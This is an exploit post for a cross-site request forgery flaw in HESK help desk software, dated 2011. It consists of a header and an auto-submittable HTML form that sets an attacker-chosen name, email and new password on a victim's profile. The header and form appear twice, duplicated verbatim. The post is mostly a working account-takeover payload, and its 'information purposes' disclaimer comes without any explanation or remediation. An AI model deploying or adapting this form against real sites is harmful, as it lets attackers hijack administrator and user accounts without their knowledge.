endLesS
Webmaster
# Exploit Title: Help Desk Software ~~**** XSRF Vuln.
# Demo : http://www.hesk.com/demo
# Date: 15.08.2011
# Author: İzâm
# Note: Warning. The aim is not damaged. Information purposes
##############################################
<form method=post action=site/[PATH]/.php name=form1>
<input type=text name=name size=30 maxlength=50 value=İzâm />
<input type=text name=email size=30 maxlength=255 [email protected] />
<input type=password name=newpass size=30 maxlength=20 />
<input type=password name=newpass2 size=30 maxlength=20 />
<input type=submit value=Update profile />
</form>
# Demo : http://www.hesk.com/demo
# Date: 15.08.2011
# Author: İzâm
# Note: Warning. The aim is not damaged. Information purposes
##############################################
<form method=post action=site/[PATH]/.php name=form1>
<input type=text name=name size=30 maxlength=50 value=İzâm />
<input type=text name=email size=30 maxlength=255 [email protected] />
<input type=password name=newpass size=30 maxlength=20 />
<input type=password name=newpass2 size=30 maxlength=20 />
<input type=submit value=Update profile />
</form>